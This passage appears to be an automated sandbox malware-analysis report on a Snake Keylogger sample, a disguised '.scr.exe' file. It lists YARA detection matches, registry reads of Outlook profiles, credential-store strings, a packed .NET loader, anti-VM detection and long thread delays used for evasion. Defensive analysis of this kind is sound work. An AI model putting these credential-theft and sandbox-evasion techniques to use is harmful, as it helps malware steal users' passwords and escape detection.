        Source: 2.2.PT98765445670009.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 2.2.PT98765445670009.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 2.2.PT98765445670009.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
        Source: 1.2.PT98765445670009.scr.exe.3f93da0.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
        Source: 1.2.PT98765445670009.scr.exe.3fe25d0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
        Source: 1.2.PT98765445670009.scr.exe.4096c60.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 1.2.PT98765445670009.scr.exe.4096c60.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 1.2.PT98765445670009.scr.exe.4096c60.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 1.2.PT98765445670009.scr.exe.4096c60.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
        Source: 1.2.PT98765445670009.scr.exe.4076230.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 1.2.PT98765445670009.scr.exe.4076230.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 1.2.PT98765445670009.scr.exe.4076230.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 1.2.PT98765445670009.scr.exe.4076230.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
        Source: 1.2.PT98765445670009.scr.exe.2f53b10.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
        Source: 1.2.PT98765445670009.scr.exe.2f512e8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
        Source: 00000001.00000002.1240469053.0000000005500000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
        Source: 00000002.00000002.3682390166.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 00000002.00000002.3682390166.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
        Source: 00000001.00000002.1240078291.0000000004034000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 00000001.00000002.1240078291.0000000004034000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
        Source: Process Memory Space: PT98765445670009.scr.exe PID: 6900, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: Process Memory Space: PT98765445670009.scr.exe PID: 6900, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
        Source: Process Memory Space: PT98765445670009.scr.exe PID: 6880, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: Process Memory Space: PT98765445670009.scr.exe PID: 6880, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
        Source: 1.2.PT98765445670009.scr.exe.3fe25d0.2.raw.unpack, DarkListView.csCryptographic APIs: 'TransformFinalBlock'
        Source: 1.2.PT98765445670009.scr.exe.4096c60.3.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
        Source: 1.2.PT98765445670009.scr.exe.4096c60.3.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
        Source: 1.2.PT98765445670009.scr.exe.4096c60.3.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
        Source: 1.2.PT98765445670009.scr.exe.4096c60.3.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
        Source: 1.2.PT98765445670009.scr.exe.5500000.6.raw.unpack, DarkListView.csCryptographic APIs: 'TransformFinalBlock'
        Source: 1.2.PT98765445670009.scr.exe.4076230.5.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
        Source: 1.2.PT98765445670009.scr.exe.4076230.5.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
        Source: 1.2.PT98765445670009.scr.exe.4076230.5.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
        Source: 1.2.PT98765445670009.scr.exe.4076230.5.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
        Source: 1.2.PT98765445670009.scr.exe.3f93da0.4.raw.unpack, DarkListView.csCryptographic APIs: 'TransformFinalBlock'
        Source: 1.2.PT98765445670009.scr.exe.3fe25d0.2.raw.unpack, DarkComboBox.csBase64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
        Source: 1.2.PT98765445670009.scr.exe.5500000.6.raw.unpack, DarkComboBox.csBase64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
        Source: 1.2.PT98765445670009.scr.exe.3f93da0.4.raw.unpack, DarkComboBox.csBase64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@3/3
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PT98765445670009.scr.exe.logJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeMutant created: NULL
        Source: PT98765445670009.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: PT98765445670009.scr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: PT98765445670009.scr.exe, 00000002.00000002.3688666945.000000000307C000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000003089000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000003046000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000003055000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000003037000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3689720823.0000000003E6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: PT98765445670009.scr.exeReversingLabs: Detection: 50%
        Source: PT98765445670009.scr.exeVirustotal: Detection: 59%
        Source: unknownProcess created: C:\Users\user\Desktop\PT98765445670009.scr.exe "C:\Users\user\Desktop\PT98765445670009.scr.exe"
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess created: C:\Users\user\Desktop\PT98765445670009.scr.exe "C:\Users\user\Desktop\PT98765445670009.scr.exe"
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess created: C:\Users\user\Desktop\PT98765445670009.scr.exe "C:\Users\user\Desktop\PT98765445670009.scr.exe"Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
        Source: PT98765445670009.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: PT98765445670009.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: PT98765445670009.scr.exe, 00000001.00000002.1240796896.00000000055C0000.00000004.08000000.00040000.00000000.sdmp, PT98765445670009.scr.exe, 00000001.00000002.1239975180.0000000002F41000.00000004.00000800.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        .NET source code contains potential unpacker
        Source: PT98765445670009.scr.exe, GxZCryAUUnpZBQsGErUvCiE.cs.Net Code: Shlyber System.AppDomain.Load(byte[])
        Source: PT98765445670009.scr.exeStatic PE information: 0xF9CC3123 [Sat Oct 21 21:18:27 2102 UTC]
        Source: PT98765445670009.scr.exeStatic PE information: section name: .text entropy: 7.276750369053607
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Yara detected AntiVM3
        Source: Yara matchFile source: Process Memory Space: PT98765445670009.scr.exe PID: 6900, type: MEMORYSTR
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeMemory allocated: 14B0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeMemory allocated: 2F40000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeMemory allocated: 2CA0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeMemory allocated: 2B40000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeMemory allocated: 2DE0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeMemory allocated: 2B40000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 600000Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 599873Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 599766Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 599655Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 599531Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 599421Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 599284Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 599156Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 599046Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 598937Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 598817Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 598687Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 598578Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 598469Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 598359Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 598250Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 598140Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 598031Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 597922Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 597797Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 597672Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 597562Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 597453Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 597339Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 597234Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 597125Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 597016Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 596891Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 596781Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 596672Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 596562Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 596453Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 596344Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 596234Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 596125Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 596016Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 595906Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 595797Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 595687Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 595572Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 595469Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 595359Jump to behavior
